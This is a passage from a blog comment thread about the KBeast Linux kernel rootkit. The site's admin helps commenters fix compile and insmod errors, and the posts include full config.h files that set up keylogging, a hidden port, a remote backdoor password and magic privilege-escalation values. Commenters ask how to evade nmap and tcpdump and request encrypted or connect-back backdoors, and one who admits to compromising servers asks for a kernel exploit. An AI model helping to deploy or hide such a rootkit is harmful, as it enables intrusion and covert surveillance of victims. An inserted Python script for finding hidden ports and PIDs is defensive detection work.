    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:741: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:745: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:746: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:747: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:748: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:749: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:750: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:751: warning: assignment makes integer from pointer without a cast
    make[2]: *** [/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o] Error 1
    make[1]: *** [_module_/usr/_h4x_/_H4X0R_dez] Error 2
    make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-34-generic'
    make: *** [all] Error 2

    Thank you!!

  27. jeandez Says:

    Hi anonymous, I tried "make" on my Ubuntu (kernel 2.6.35); this is what I get:
    root@bob:/usr/_h4x_/_H4X0R_dez# make
    make -C /lib/modules/2.6.35-22-generic/build M=/usr/_h4x_/_H4X0R_dez modules
    make[1]: Entering directory `/usr/src/linux-headers-2.6.35-22-generic'
    CC [M] /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o
    In file included from /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:34:
    /usr/_h4x_/_H4X0R_dez/config.h:8: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘TRUE’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: warning: ‘struct vtm’ declared inside parameter list
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: warning: its scope is only this definition or declaration, which is probably not what you want
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:107: warning: ‘struct vtm’ declared inside parameter list
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:107: error: conflicting types for ‘epoch2time’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:59: note: previous declaration of ‘epoch2time’ was here
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘epoch2time’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:130: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:132: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:133: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:141: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:142: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:148: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:149: error: dereferencing pointer to incomplete type
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘get_time’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:158: error: storage size of ‘tm’ isn’t known
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:158: warning: unused variable ‘tm’
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘log_to_file’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: ‘_H4X_PATH_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: (Each undeclared identifier is reported only once
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:181: error: for each function it appears in.)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_tcp4_seq_show’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:221: error: ‘_HIDE_PORT_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_read’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:242: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_write’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:479: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_unlink’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:570: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_rmdir’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:585: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_unlinkat’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:599: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_rename’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:615: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_open’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:632: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_kill’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:649: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:653: error: ‘_MAGIC_SIG_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:653: error: ‘_MAGIC_PID_’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘h4x_delete_module’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:665: error: ‘KBEAST’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘init’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:679: warning: ISO C90 forbids mixed declarations and code
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:684: error: ‘TRUE’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:686: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:689: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:694: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:695: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:699: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:700: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:701: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:702: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:703: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:704: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:705: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:706: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:707: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:708: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:709: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:710: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:711: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:712: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c: In function ‘exit’:
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:734: error: ‘TRUE’ undeclared (first use in this function)
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:735: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:737: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:741: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:745: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:746: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:747: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:748: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:749: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:750: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c:751: warning: assignment makes integer from pointer without a cast
    make[2]: *** [/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o] Error 1
    make[1]: *** [_module_/usr/_h4x_/_H4X0R_dez] Error 2
    make[1]: Leaving directory `/usr/src/linux-headers-2.6.35-22-generic'
    make: *** [all] Error 2

    Thank you for helping me!!

  28. IPSECS Admin Says:

    Hi There,
    Based on the config.h that you pasted above, the problem is that you removed the # before define, so the kbeast compilation has errors. It's C, not perl/bash.

  29. 29
    jeandez Says:

    that help. But after adding # before define, i got

    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [OK]
    Compiling Network Daemon File : [OK]
    Inserting Loadable Kernel Module : [NOT OK] // oops !!!!!!!!!

    There is a problem when inserting the loadable kernel module..

    I also give you my config.h file, perhaps the problem is with it.

    #define TRUE 1
    #define FALSE 0

    /*
    Enable keylog probably makes the system unstable
    But worth to be tried
    */
    #define _KEYLOG_ TRUE

    /*Define your module & network daemon name*/
    #define KBEAST "kbeast"

    /*
    All files, dirs, process will be hidden
    Protected from deletion & being killed
    */
    #define _H4X0R_ "_h4x_"

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    #define _H4X_PATH_ "/usr/_h4x_/_H4X0R_dez"

    /*
    File to save key logged data
    */
    #define _LOGFILE_ "acctlog"

    /*
    This port will be hidden from netstat
    */
    #define _HIDE_PORT_ 13377

    /*
    Password for remote access
    */
    #define _RPASSWORD_ "h4x3d"
    #define _MAGIC_NAME_ "kangaman"
    /*
    Magic signal & pid for local escalation
    */
    #define _MAGIC_SIG_ 37 //kill signal
    #define _MAGIC_PID_ 31337 //kill this pid

  30.
    IPSECS Admin Says:

    Can you go to the H4X PATH directory, then type 'insmod ipsecs-kbeast-v1.ko' and paste the result here?

  31.
    jeandez Says:

    I got:
    insmod: error inserting 'ipsecs-kbeast-V1.ko': -1 operation not permitted
    That means only root can install a rootkit???????

    I switched to root: /usr/_h4x_/_H4X0R_dez# inmod-kbeast-v1.ko
    OK, that works, but there is a problem when doing ./setup build 1

  32.
    jeandez Says:

    root@kangaman-laptop:/usr/_h4x_/_H4X0R_dez/kbeast-v1# ./setup build

    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/kbeast-v1/ipsecs-kbeast-v1.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/kbeast-v1/ipsecs-kbeast-v1.cc1»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/kbeast-v1/bd-ipsecs-kbeast-v1.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/.ipsecs-kbeast-v1.o.cmd»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/.ipsecs-kbeast-v1.mod.o.cmd»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.ko»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.cc1»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/.ipsecs-kbeast-v1.ko.cmd»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/bd-ipsecs-kbeast-v1.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.mod.o»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/.tmp_versions/ipsecs-kbeast-v1.mod»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.mod.c»: Permission non accordée
    rm: impossible de supprimer «/usr/_h4x_/_H4X0R_dez/ipsecs-kbeast-v1.o»: Permission non accordée
    cp: «/usr/_h4x_/_H4X0R_dez/kbeast-v1» et «/usr/_h4x_/_H4X0R_dez/kbeast-v1» identifient le même fichier
    [OK]
    Compiling Kernel Module : [OK]
    Compiling Network Daemon File : [OK]
    Inserting Loadable Kernel Module : [NOT OK] ////!!!!!!pblem

  33.
    IPSECS Admin Says:

    Hi There,
    From my point of view, before you start to play with a loadable kernel rootkit, please at least:
    1. Learn basic C programming
    2. Learn about Linux loadable kernel modules in general
    3. Learn how to read a bash script

    After “insmod” is successfully executed, kbeast is already installed on your machine; that’s why removing the kbeast directory fails.

    If you still don’t understand, reboot your box, remove /usr/_h4x_, re-download the kbeast source, don’t screw it up because you don’t understand, and run ./setup build . Thx

  34.
    jeandez Says:

    Thank you for the advice. I’ll try to improve..

  35.
    Pr0ts Says:

    Dudes, I’ve been testing KBeast, and first of all congratz for your work.
    I have some points:
    When I nmap from inside, I can get the TCP open port;
    tcpdump also shows the activity of the rootkit (from inside the host).

    Is it possible to bypass those things? If so, do you know any rootkit that does it?
    Thanks

  36.
    jeandez Says:

    I didn’t try, but you can try ‘knark’ (but it is old)

  37.
    IPSECS Admin Says:

    Hi Pr0ts,
    Yes, it’s detected remotely. I think that we can use the port knocking concept to solve your concern. But we should modify the ioctl syscall to hide your sniffer. Tq

  38.
    IPSECS Admin Says:

    I mean the sniffer used by port knocking, in order to activate the remote backdoor whenever you need.

  39.
    blackrain Says:

    I have a few ideas for the next version:

    Remote backdoor uses an encrypted protocol (so the admin can’t see what commands you have typed by using a packet sniffer).

    Any already open port can be used to gain access using a remote backdoor.

    Support for newer Linux 3.x kernels (Ubuntu 11.10 and 12.04) if not already implemented.

  40.
    Student Says:

    hi,
    I installed Kbeast without changing the config.h file. Then I ran rkhunter (the newest version, which detects Kbeast) and I saw there was no hidden process. In fact I am going to see, when Kbeast is active and doing something, which PIDs will be running. But right now I could not see any hidden proc through rkhunter. I think this happened since I did not activate Kbeast and it did not work. Would anyone help me with how I can work with Kbeast?
    thanks a lot.

  42.
    student Says:

    hi,
    I installed kbeast and then ran rkhunter-1.4.0. It detected kbeast and showed me the message that the kbeast rootkit was found.
    But when I changed the code of the rootkit and tried to build it again, I saw an error. So I cleared those changes and tried to install kbeast again without any change. It told me that it built correctly, but when I ran rkhunter again, I saw the message “kbeast rootkit warning (possible rootkit)”; in fact it could not detect it completely. What should I do?
    I want rkhunter to detect it, and then I want to see the hidden processes that were created because of that rootkit.
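    The concern raised in comments 35 to 42 (a port hidden from netstat but still open to nmap, processes hidden from ps that rkhunter may or may not list) is best checked from the defender's side with a cross-view comparison: ask /proc what it shows, then probe the kernel directly and diff the two. This is an added example and not code from KBeast or the IPSECS authors; the /proc/net/tcp excerpt is constructed, and the probe functions assume a Linux host with a loopback interface.

```python
"""Cross-view check for ports and PIDs hidden from netstat/ps.

Added example for this comment thread, not code from KBeast or IPSECS.
A rootkit that filters what ps/netstat read from /proc cannot stop a local
connect() from reaching a hidden listening port, and unless it also hooks
kill() it cannot stop kill(pid, 0) from reaching a hidden process. Diffing
both views exposes the gap. IPv4 only: /proc/net/tcp6 is not read.
"""
import os
import socket

# Constructed /proc/net/tcp excerpt: listeners on 22 and 3306 (st 0A)
# plus one established connection (st 01) that must be ignored.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000    27        0 22222 1 0000000000000000 100 0 0 10 0
   2: 0100007F:9C40 0100007F:0CEA 01 00000000:00000000 00:00000000 00000000  1000        0 33333 1 0000000000000000 20 4 30 10 -1
"""


def listening_ports(proc_net_tcp_text):
    """Local ports in state 0A (LISTEN) as /proc/net/tcp reports them."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:   # skip header row
        fields = line.split()
        if len(fields) >= 4 and fields[3] == "0A":
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))  # hex port
    return ports


def probe_ports(ports, host="127.0.0.1", timeout=0.05):
    """Ports that accept a TCP connection, whatever /proc claims."""
    reachable = set()
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                reachable.add(port)
    return reachable


def hidden_items(visible, reachable):
    """Items a direct probe reaches but the /proc view omits."""
    return sorted(set(reachable) - set(visible))


def visible_pids():
    """PIDs a directory listing of /proc shows (what ps relies on)."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def probe_pids(max_pid=32768):
    """PIDs that answer kill(pid, 0); EPERM still proves existence."""
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        alive.add(pid)
    return alive


if __name__ == "__main__":
    proc_ports = listening_ports(open("/proc/net/tcp").read())
    print("hidden ports:", hidden_items(proc_ports, probe_ports(range(1, 65536))))
    print("hidden pids:", hidden_items(visible_pids(), probe_pids()))
```

    Any port or PID reported as hidden is a candidate for kernel-level filtering and deserves a look from a trusted live medium; an empty result only rules out this particular gap.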

  43.
    anonymous Says:

    I lost four hacked servers with that rootkit. After the installation the rootkit worked very well. So, after some time I had only an unstable system. Now, how can I exploit the new system reinstalled by the admin? Do you have an exploit for the 3.2.0-24 Linux kernel?

  44.
    rex Says:

    If you can replace the bind port backdoor with the connect-back backdoor, it would be perfect.

  45.
    rex Says:

    If you can replace the bind port backdoor with the reverse-connect backdoor, it would be perfect.

  46.
    Syd Says:

    I installed KBeast (Linux rootkit 2012) and the package works just as described, except for the fact that I can’t seem to see anything in my key logging file (i.e. the file is empty). In particular, below is how I define this file.

    /*
    File to save key logged data
    */
    #define _LOGFILE_ "rootkit.log"

    However, when I go to the location of this file, “/usr/_h4x_rootKit”, I see a file named “rootkit.log.9”. When I attempt to read this file (using vim) I get the message that the file is already opened, and if I open it in “read only” mode (or using cat), it’s empty. How do I view the data?

  47.
    rex Says:

    Hi. I tested this on CentOS 6.3 (64bit) running 2.6.32-279 and it didn’t work, help me.
    [root@test1 kbeast-v1]# uname -a
    Linux test1 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
    [root@test1 kbeast-v1]# ./setup build 1

    ::::::::::: ::::::::: :::::::: :::::::::: :::::::: ::::::::
    :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
    +:+ +:+ +:+ +:+ +:+ +:+ +:+
    +#+ +#++:++#+ +#++:++#++ +#++:++# +#+ +#++:++#++
    +#+ +#+ +#+ +#+ +#+ +#+
    #+# #+# #+# #+# #+# #+# #+# #+# #+#
    ########### ### ######## ########## ######## ########

    Checking for Kernel Beast : [OK]
    Checking for sed : /bin/sed
    Generating C file from .cc1 : [OK]
    Checking for Makefile : [OK]
    Checking for Network Daemon : [OK]
    Checking for Config File : [OK]
    Checking for Kernel Header : [OK]
    Checking for gcc : /usr/bin/gcc
    Checking for make : /usr/bin/make
    Checking for kernel version : [OK]
    Creating Install Directory : [OK]
    Compiling Kernel Module : [NOT OK]

    [root@test1 kbeast-v1]# cat config.h
    /*
    Kernel Beast Ver #1.0 – Configuration File
    Copyright Ph03n1X of IPSECS (c) 2011
    Get more research of ours http://ipsecs.com
    */

    /*Don’t change this line*/
    #define TRUE 1
    #define FALSE 0

    /*
    Enable keylog probably makes the system unstable
    But worth to be tried
    */
    #define _KEYLOG_ TRUE

    /*Define your module & network daemon name*/
    #define KBEAST "kbeast"

    /*
    All files, dirs, process will be hidden
    Protected from deletion & being killed
    */
    #define _H4X0R_ "_h4x_"

    /*
    Directory where your rootkit will be saved
    You have to use _H4X0R_ in your directory name
    No slash (/) at the end
    */
    #define _H4X_PATH_ "/usr/_h4x_"

    /*
    File to save key logged data
    */
    #define _LOGFILE_ "acctlog"

    /*
    This port will be hidden from netstat
    */
    #define _HIDE_PORT_ 13377

    /*
    Password for remote access
    */
    #define _RPASSWORD_ "h4x3d"
    #define _MAGIC_NAME_ "xxx"
    /*
    Magic signal & pid for local escalation
    */
    #define _MAGIC_SIG_ 37 //kill signal
    #define _MAGIC_PID_ 31337 //kill this pid

  48.
    rex Says:

    [root@test1 _h4x_]# make
    make -C /lib/modules/2.6.32-279.el6.x86_64/build M=/usr/_h4x_ modules
    make[1]: Entering directory `/usr/src/kernels/2.6.32-279.el6.x86_64'
    CC [M] /usr/_h4x_/ipsecs-kbeast-v1.o
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_read’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:239: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_write’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:476: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_getdents’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:507: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:509: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:511: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:513: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:516: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:521: error: dereferencing pointer to incomplete type
    /usr/_h4x_/ipsecs-kbeast-v1.c:503: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c:523: warning: ignoring return value of ‘copy_to_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_unlink’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:569: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_rmdir’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:584: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_unlinkat’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:598: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_rename’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:613: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c:614: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_open’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:630: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘h4x_delete_module’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:664: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘init’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:679: warning: ISO C90 forbids mixed declarations and code
    /usr/_h4x_/ipsecs-kbeast-v1.c:686: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:689: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:691: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:692: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:699: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:700: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:701: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:702: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:703: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:704: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:705: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:706: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:707: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:708: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:709: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:710: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:711: warning: assignment makes pointer from integer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:712: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c: At top level:
    /usr/_h4x_/ipsecs-kbeast-v1.c:727: warning: conflicting types for built-in function ‘exit’
    /usr/_h4x_/ipsecs-kbeast-v1.c: In function ‘exit’:
    /usr/_h4x_/ipsecs-kbeast-v1.c:735: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:737: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:739: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:745: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:746: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:747: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:748: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:749: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:750: warning: assignment makes integer from pointer without a cast
    /usr/_h4x_/ipsecs-kbeast-v1.c:751: warning: assignment makes integer from pointer without a cast
    make[2]: *** [/usr/_h4x_/ipsecs-kbeast-v1.o] Error 1
    make[1]: *** [_module_/usr/_h4x_] Error 2
    make[1]: Leaving directory `/usr/src/kernels/2.6.32-279.el6.x86_64'
    make: *** [all] Error 2

  49.
    pxf Says:

